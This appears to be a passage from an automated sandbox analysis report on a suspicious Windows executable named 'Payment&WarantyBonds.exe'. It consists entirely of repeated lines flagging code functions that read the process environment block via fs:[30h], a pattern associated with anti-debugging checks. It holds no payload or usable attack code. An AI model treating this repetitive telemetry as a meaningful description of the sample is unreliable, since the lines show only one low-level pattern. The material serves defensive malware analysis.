                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018A2000 mov eax, dword ptr fs:[00000030h]2_2_018A2000
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018A2000 mov eax, dword ptr fs:[00000030h]2_2_018A2000
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017FC0F0 mov eax, dword ptr fs:[00000030h]2_2_017FC0F0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0181E016 mov eax, dword ptr fs:[00000030h]2_2_0181E016
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0181E016 mov eax, dword ptr fs:[00000030h]2_2_0181E016
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0181E016 mov eax, dword ptr fs:[00000030h]2_2_0181E016
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0181E016 mov eax, dword ptr fs:[00000030h]2_2_0181E016
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017FA0E3 mov ecx, dword ptr fs:[00000030h]2_2_017FA0E3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01896030 mov eax, dword ptr fs:[00000030h]2_2_01896030
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01802050 mov eax, dword ptr fs:[00000030h]2_2_01802050
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01886050 mov eax, dword ptr fs:[00000030h]2_2_01886050
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017F80A0 mov eax, dword ptr fs:[00000030h]2_2_017F80A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182C073 mov eax, dword ptr fs:[00000030h]2_2_0182C073
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182438F mov eax, dword ptr fs:[00000030h]2_2_0182438F
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182438F mov eax, dword ptr fs:[00000030h]2_2_0182438F
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180A3C0 mov eax, dword ptr fs:[00000030h]2_2_0180A3C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180A3C0 mov eax, dword ptr fs:[00000030h]2_2_0180A3C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180A3C0 mov eax, dword ptr fs:[00000030h]2_2_0180A3C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180A3C0 mov eax, dword ptr fs:[00000030h]2_2_0180A3C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180A3C0 mov eax, dword ptr fs:[00000030h]2_2_0180A3C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180A3C0 mov eax, dword ptr fs:[00000030h]2_2_0180A3C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018083C0 mov eax, dword ptr fs:[00000030h]2_2_018083C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018083C0 mov eax, dword ptr fs:[00000030h]2_2_018083C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018083C0 mov eax, dword ptr fs:[00000030h]2_2_018083C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018083C0 mov eax, dword ptr fs:[00000030h]2_2_018083C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018BC3CD mov eax, dword ptr fs:[00000030h]2_2_018BC3CD
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018863C0 mov eax, dword ptr fs:[00000030h]2_2_018863C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018AE3DB mov eax, dword ptr fs:[00000030h]2_2_018AE3DB
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018AE3DB mov eax, dword ptr fs:[00000030h]2_2_018AE3DB
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018AE3DB mov ecx, dword ptr fs:[00000030h]2_2_018AE3DB
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018AE3DB mov eax, dword ptr fs:[00000030h]2_2_018AE3DB
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018A43D4 mov eax, dword ptr fs:[00000030h]2_2_018A43D4
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018A43D4 mov eax, dword ptr fs:[00000030h]2_2_018A43D4
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018103E9 mov eax, dword ptr fs:[00000030h]2_2_018103E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018103E9 mov eax, dword ptr fs:[00000030h]2_2_018103E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018103E9 mov eax, dword ptr fs:[00000030h]2_2_018103E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018103E9 mov eax, dword ptr fs:[00000030h]2_2_018103E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018103E9 mov eax, dword ptr fs:[00000030h]2_2_018103E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018103E9 mov eax, dword ptr fs:[00000030h]2_2_018103E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018103E9 mov eax, dword ptr fs:[00000030h]2_2_018103E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018103E9 mov eax, dword ptr fs:[00000030h]2_2_018103E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017FC310 mov ecx, dword ptr fs:[00000030h]2_2_017FC310
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0181E3F0 mov eax, dword ptr fs:[00000030h]2_2_0181E3F0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0181E3F0 mov eax, dword ptr fs:[00000030h]2_2_0181E3F0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0181E3F0 mov eax, dword ptr fs:[00000030h]2_2_0181E3F0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018363FF mov eax, dword ptr fs:[00000030h]2_2_018363FF
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183A30B mov eax, dword ptr fs:[00000030h]2_2_0183A30B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183A30B mov eax, dword ptr fs:[00000030h]2_2_0183A30B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183A30B mov eax, dword ptr fs:[00000030h]2_2_0183A30B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01820310 mov ecx, dword ptr fs:[00000030h]2_2_01820310
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D8324 mov eax, dword ptr fs:[00000030h]2_2_018D8324
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D8324 mov ecx, dword ptr fs:[00000030h]2_2_018D8324
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D8324 mov eax, dword ptr fs:[00000030h]2_2_018D8324
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D8324 mov eax, dword ptr fs:[00000030h]2_2_018D8324
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01882349 mov eax, dword ptr fs:[00000030h]2_2_01882349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01882349 mov eax, dword ptr fs:[00000030h]2_2_01882349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01882349 mov eax, dword ptr fs:[00000030h]2_2_01882349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01882349 mov eax, dword ptr fs:[00000030h]2_2_01882349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01882349 mov eax, dword ptr fs:[00000030h]2_2_01882349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01882349 mov eax, dword ptr fs:[00000030h]2_2_01882349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01882349 mov eax, dword ptr fs:[00000030h]2_2_01882349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01882349 mov eax, dword ptr fs:[00000030h]2_2_01882349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01882349 mov eax, dword ptr fs:[00000030h]2_2_01882349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01882349 mov eax, dword ptr fs:[00000030h]2_2_01882349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01882349 mov eax, dword ptr fs:[00000030h]2_2_01882349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01882349 mov eax, dword ptr fs:[00000030h]2_2_01882349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01882349 mov eax, dword ptr fs:[00000030h]2_2_01882349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01882349 mov eax, dword ptr fs:[00000030h]2_2_01882349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01882349 mov eax, dword ptr fs:[00000030h]2_2_01882349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D634F mov eax, dword ptr fs:[00000030h]2_2_018D634F
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0188035C mov eax, dword ptr fs:[00000030h]2_2_0188035C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0188035C mov eax, dword ptr fs:[00000030h]2_2_0188035C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0188035C mov eax, dword ptr fs:[00000030h]2_2_0188035C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0188035C mov ecx, dword ptr fs:[00000030h]2_2_0188035C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0188035C mov eax, dword ptr fs:[00000030h]2_2_0188035C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0188035C mov eax, dword ptr fs:[00000030h]2_2_0188035C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018A8350 mov ecx, dword ptr fs:[00000030h]2_2_018A8350
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018CA352 mov eax, dword ptr fs:[00000030h]2_2_018CA352
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017F8397 mov eax, dword ptr fs:[00000030h]2_2_017F8397
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017F8397 mov eax, dword ptr fs:[00000030h]2_2_017F8397
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017F8397 mov eax, dword ptr fs:[00000030h]2_2_017F8397
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018A437C mov eax, dword ptr fs:[00000030h]2_2_018A437C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017FE388 mov eax, dword ptr fs:[00000030h]2_2_017FE388
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017FE388 mov eax, dword ptr fs:[00000030h]2_2_017FE388
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017FE388 mov eax, dword ptr fs:[00000030h]2_2_017FE388
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183E284 mov eax, dword ptr fs:[00000030h]2_2_0183E284
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183E284 mov eax, dword ptr fs:[00000030h]2_2_0183E284
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01880283 mov eax, dword ptr fs:[00000030h]2_2_01880283
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01880283 mov eax, dword ptr fs:[00000030h]2_2_01880283
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01880283 mov eax, dword ptr fs:[00000030h]2_2_01880283
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017F826B mov eax, dword ptr fs:[00000030h]2_2_017F826B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018102A0 mov eax, dword ptr fs:[00000030h]2_2_018102A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018102A0 mov eax, dword ptr fs:[00000030h]2_2_018102A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018962A0 mov eax, dword ptr fs:[00000030h]2_2_018962A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018962A0 mov ecx, dword ptr fs:[00000030h]2_2_018962A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018962A0 mov eax, dword ptr fs:[00000030h]2_2_018962A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018962A0 mov eax, dword ptr fs:[00000030h]2_2_018962A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018962A0 mov eax, dword ptr fs:[00000030h]2_2_018962A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018962A0 mov eax, dword ptr fs:[00000030h]2_2_018962A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017FA250 mov eax, dword ptr fs:[00000030h]2_2_017FA250
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180A2C3 mov eax, dword ptr fs:[00000030h]2_2_0180A2C3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180A2C3 mov eax, dword ptr fs:[00000030h]2_2_0180A2C3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180A2C3 mov eax, dword ptr fs:[00000030h]2_2_0180A2C3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180A2C3 mov eax, dword ptr fs:[00000030h]2_2_0180A2C3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180A2C3 mov eax, dword ptr fs:[00000030h]2_2_0180A2C3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017F823B mov eax, dword ptr fs:[00000030h]2_2_017F823B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D62D6 mov eax, dword ptr fs:[00000030h]2_2_018D62D6
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018102E1 mov eax, dword ptr fs:[00000030h]2_2_018102E1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018102E1 mov eax, dword ptr fs:[00000030h]2_2_018102E1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018102E1 mov eax, dword ptr fs:[00000030h]2_2_018102E1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01888243 mov eax, dword ptr fs:[00000030h]2_2_01888243
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01888243 mov ecx, dword ptr fs:[00000030h]2_2_01888243
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D625D mov eax, dword ptr fs:[00000030h]2_2_018D625D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01806259 mov eax, dword ptr fs:[00000030h]2_2_01806259
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018BA250 mov eax, dword ptr fs:[00000030h]2_2_018BA250
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018BA250 mov eax, dword ptr fs:[00000030h]2_2_018BA250
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01804260 mov eax, dword ptr fs:[00000030h]2_2_01804260
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01804260 mov eax, dword ptr fs:[00000030h]2_2_01804260
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01804260 mov eax, dword ptr fs:[00000030h]2_2_01804260
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B0274 mov eax, dword ptr fs:[00000030h]2_2_018B0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B0274 mov eax, dword ptr fs:[00000030h]2_2_018B0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B0274 mov eax, dword ptr fs:[00000030h]2_2_018B0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B0274 mov eax, dword ptr fs:[00000030h]2_2_018B0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B0274 mov eax, dword ptr fs:[00000030h]2_2_018B0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B0274 mov eax, dword ptr fs:[00000030h]2_2_018B0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B0274 mov eax, dword ptr fs:[00000030h]2_2_018B0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B0274 mov eax, dword ptr fs:[00000030h]2_2_018B0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B0274 mov eax, dword ptr fs:[00000030h]2_2_018B0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B0274 mov eax, dword ptr fs:[00000030h]2_2_018B0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B0274 mov eax, dword ptr fs:[00000030h]2_2_018B0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B0274 mov eax, dword ptr fs:[00000030h]2_2_018B0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01802582 mov eax, dword ptr fs:[00000030h]2_2_01802582
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01802582 mov ecx, dword ptr fs:[00000030h]2_2_01802582
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01834588 mov eax, dword ptr fs:[00000030h]2_2_01834588
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183E59C mov eax, dword ptr fs:[00000030h]2_2_0183E59C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018805A7 mov eax, dword ptr fs:[00000030h]2_2_018805A7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018805A7 mov eax, dword ptr fs:[00000030h]2_2_018805A7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018805A7 mov eax, dword ptr fs:[00000030h]2_2_018805A7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018245B1 mov eax, dword ptr fs:[00000030h]2_2_018245B1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018245B1 mov eax, dword ptr fs:[00000030h]2_2_018245B1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183E5CF mov eax, dword ptr fs:[00000030h]2_2_0183E5CF
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183E5CF mov eax, dword ptr fs:[00000030h]2_2_0183E5CF
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018065D0 mov eax, dword ptr fs:[00000030h]2_2_018065D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183A5D0 mov eax, dword ptr fs:[00000030h]2_2_0183A5D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183A5D0 mov eax, dword ptr fs:[00000030h]2_2_0183A5D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018025E0 mov eax, dword ptr fs:[00000030h]2_2_018025E0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182E5E7 mov eax, dword ptr fs:[00000030h]2_2_0182E5E7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182E5E7 mov eax, dword ptr fs:[00000030h]2_2_0182E5E7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182E5E7 mov eax, dword ptr fs:[00000030h]2_2_0182E5E7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182E5E7 mov eax, dword ptr fs:[00000030h]2_2_0182E5E7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182E5E7 mov eax, dword ptr fs:[00000030h]2_2_0182E5E7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182E5E7 mov eax, dword ptr fs:[00000030h]2_2_0182E5E7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182E5E7 mov eax, dword ptr fs:[00000030h]2_2_0182E5E7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182E5E7 mov eax, dword ptr fs:[00000030h]2_2_0182E5E7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183C5ED mov eax, dword ptr fs:[00000030h]2_2_0183C5ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183C5ED mov eax, dword ptr fs:[00000030h]2_2_0183C5ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01896500 mov eax, dword ptr fs:[00000030h]2_2_01896500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D4500 mov eax, dword ptr fs:[00000030h]2_2_018D4500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D4500 mov eax, dword ptr fs:[00000030h]2_2_018D4500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D4500 mov eax, dword ptr fs:[00000030h]2_2_018D4500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D4500 mov eax, dword ptr fs:[00000030h]2_2_018D4500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D4500 mov eax, dword ptr fs:[00000030h]2_2_018D4500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D4500 mov eax, dword ptr fs:[00000030h]2_2_018D4500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D4500 mov eax, dword ptr fs:[00000030h]2_2_018D4500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810535 mov eax, dword ptr fs:[00000030h]2_2_01810535
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810535 mov eax, dword ptr fs:[00000030h]2_2_01810535
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810535 mov eax, dword ptr fs:[00000030h]2_2_01810535
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810535 mov eax, dword ptr fs:[00000030h]2_2_01810535
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810535 mov eax, dword ptr fs:[00000030h]2_2_01810535
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810535 mov eax, dword ptr fs:[00000030h]2_2_01810535
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182E53E mov eax, dword ptr fs:[00000030h]2_2_0182E53E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182E53E mov eax, dword ptr fs:[00000030h]2_2_0182E53E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182E53E mov eax, dword ptr fs:[00000030h]2_2_0182E53E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182E53E mov eax, dword ptr fs:[00000030h]2_2_0182E53E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182E53E mov eax, dword ptr fs:[00000030h]2_2_0182E53E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01808550 mov eax, dword ptr fs:[00000030h]2_2_01808550
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01808550 mov eax, dword ptr fs:[00000030h]2_2_01808550
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183656A mov eax, dword ptr fs:[00000030h]2_2_0183656A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183656A mov eax, dword ptr fs:[00000030h]2_2_0183656A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183656A mov eax, dword ptr fs:[00000030h]2_2_0183656A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018BA49A mov eax, dword ptr fs:[00000030h]2_2_018BA49A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017F645D mov eax, dword ptr fs:[00000030h]2_2_017F645D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018064AB mov eax, dword ptr fs:[00000030h]2_2_018064AB
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018344B0 mov ecx, dword ptr fs:[00000030h]2_2_018344B0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0188A4B0 mov eax, dword ptr fs:[00000030h]2_2_0188A4B0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017FC427 mov eax, dword ptr fs:[00000030h]2_2_017FC427
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017FE420 mov eax, dword ptr fs:[00000030h]2_2_017FE420
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017FE420 mov eax, dword ptr fs:[00000030h]2_2_017FE420
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017FE420 mov eax, dword ptr fs:[00000030h]2_2_017FE420
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018004E5 mov ecx, dword ptr fs:[00000030h]2_2_018004E5
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01838402 mov eax, dword ptr fs:[00000030h]2_2_01838402
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01838402 mov eax, dword ptr fs:[00000030h]2_2_01838402
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01838402 mov eax, dword ptr fs:[00000030h]2_2_01838402
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01886420 mov eax, dword ptr fs:[00000030h]2_2_01886420
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01886420 mov eax, dword ptr fs:[00000030h]2_2_01886420
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01886420 mov eax, dword ptr fs:[00000030h]2_2_01886420
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01886420 mov eax, dword ptr fs:[00000030h]2_2_01886420
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01886420 mov eax, dword ptr fs:[00000030h]2_2_01886420
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01886420 mov eax, dword ptr fs:[00000030h]2_2_01886420
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01886420 mov eax, dword ptr fs:[00000030h]2_2_01886420
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183E443 mov eax, dword ptr fs:[00000030h]2_2_0183E443
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183E443 mov eax, dword ptr fs:[00000030h]2_2_0183E443
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183E443 mov eax, dword ptr fs:[00000030h]2_2_0183E443
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183E443 mov eax, dword ptr fs:[00000030h]2_2_0183E443
